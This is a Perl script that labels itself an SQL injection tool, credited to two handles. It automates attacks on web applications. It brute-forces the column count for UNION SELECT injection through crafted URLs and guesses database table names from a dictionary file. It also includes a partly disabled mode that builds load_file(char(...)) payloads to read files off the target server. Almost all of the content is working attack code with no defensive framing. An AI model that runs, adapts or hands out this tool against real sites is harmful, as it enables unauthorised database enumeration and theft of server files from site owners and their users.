#!/usr/bin/perl
#=========================================================================#
use LWP::UserAgent;
use Getopt::Std;
#=========================================================================#

#=========================================================================#
#=MAIN===================================================================#
print "\n AAAAAA OOOOOO H H\n";
print " A A O O H H\n";
print " AAAAAA O O HHHHH\n";
print " A A O O H H\n";
print " A A OOOOOO H H\n\n";
$filt=1; #only chars in resolt
my $www = LWP::UserAgent->new;
uss();
if(!$ARGV[0])
{
ans();
while (true)
{
print "\nNew file (^c for quit) ->";
$f=<STDIN>;
$f =~ s/\n//;
enc(); #encode file
burl();
conn();
getres();
}
}
if ($ARGV[0] eq '-b')
{
print "Url for brute-> "; $u=<STDIN>;
$u =~ s/\n//;
brute();
}
if ($ARGV[0] eq '-t')
{
print "Url for brute-> "; $u=<STDIN>;
$u =~ s/\n//;
brute_table()
}
#=END=MAIN============================================================#
#=======================================================================#

sub brute()
{
$max=40;
$res='';
for ($j=1;$j<$max;$j++)
{
for ($i=1;$i<$j+1;$i++)
{
$utmp.=$i."26639-1,";
}
$utmp = substr($utmp, 0, length ($utmp) - 1 );
$utmp = $u."+UNION+SELECT+".$utmp."/*";
if($coll=chk($utmp))
{
$utmp =~ s\26639-1\\g;
print("[+$j] OK! Coloun number $coll is visible\r\n$utmp");
exit(0);
}
else
{
print("[-$j] falure... ($szz Bytes)\r\n");
}
#print $utmp."\r\n";
$utmp="";
}
}
########################################
sub brute_table()
{
print("--- bruting Colouns ---\r\n");
$max=40;
$res='';
for ($j=1;$j<$max;$j++)
{
for ($i=1;$i<$j+1;$i++)
{
$utmp.=$i."26639-1,";
}
$utmp = substr($utmp, 0, length ($utmp) - 1 );
$utmp = $u."+UNION+SELECT+".$utmp."/*";
if($coll=chk($utmp))
{

print("[+$j] OK! Coloun number $coll is visible\r\n$utmp");
print("\r\n--- bruting Tables ---\r\n");
open(CATFILE, $ARGV[1]);
while($line=readline(CATFILE))
{
chomp($line);
$sql=substr($utmp,0,length($utmp)-2);
$sql.="+FROM+".$line."/*";
if (chk($sql))
{
$sql =~ s\26639-1\\g;
print "[OK] ".$sql."\r\n";
$all_sql.="[OK] ".$sql."\r\n";
}
else
{
print "[-] No table $line\r\n";
}
$sql="";
}
print("\r\n--- Results ---\r\n");
print $all_sql;
exit;
}
else
{
print("[-$j] falure... ($szz Bytes)\r\n");
}
#print $utmp."\r\n";
$utmp="";
}
}
########################################


sub chk()
{
$resp = $www -> get( $_[0] ) or die();
$szz=length($resp->content());
if ($resp->content() =~ /(\d+)26638/) {return($1);}
}

sub ans()

{
exit("bete verion, load_file not correctly working. use -b or -t ");
print "\nAnsver some questions ;)\r\n";
print "Url for union-> "; $u=<STDIN>;
print "Number of coloums -> "; $n=<STDIN>;
print "Coloum with union -> "; $c=<STDIN>;
$u =~ s/\n//;
$f =~ s/\n//;
}

sub enc()
{
for ($i=0;$i<length($f);$i++) {$enc .= ord(substr($f, $i,1 )).',';}
$enc = substr($enc, 0, length ($enc) - 1 );
$f=$enc;
$enc='';
}

sub burl()
{
print "[~] File: $f\n";
$ur = $u; $tmp='';
for ($i=0;$i<$n;$i++)
{
if($i==$c-1)
{
$tmp.="load_file(char($f)),";
}
else
{
$tmp.="0,";
}
}
$tmp = substr($tmp, 0, length ($tmp) - 1 );
$ur.= "+union+select+$tmp/*";
print "[~] url: $ur\n";
}

sub conn ()
{
print "[~] Sending ...\n";
my $resp = $www -> get( $ur );
$cont = $resp -> content();
}

sub getres()
{
$s="_page\">";
$e="</";
$result;
#print $cont;
print "[~] Start: $s \n";
print "[~] End: $e \n";
print "[~] Searching...\n ";
@stringz=split("\n",$cont);
for(@stringz)
{
if(/$e/) { $p = 0; }
$result .= $_."\r\n" if $p;
if(/$s/){ $p = 1; }
}
$result =~ tr/a-zA-Z /a-zA-Z/d;
if($result)
{
print "[+] I found something! \n\n $result";
}
else
{
print "[-] Not found...\n ";
}
$result='';
}



sub uss()
{
print 'AOH SQL INJECTION TOOL By AoH]Slon and AoH]GvOzDiK'."\n";
print '-b for brute colouns'."\n";
print '-t [dictionary_table] for brute tables and colouns'."\n\n";
}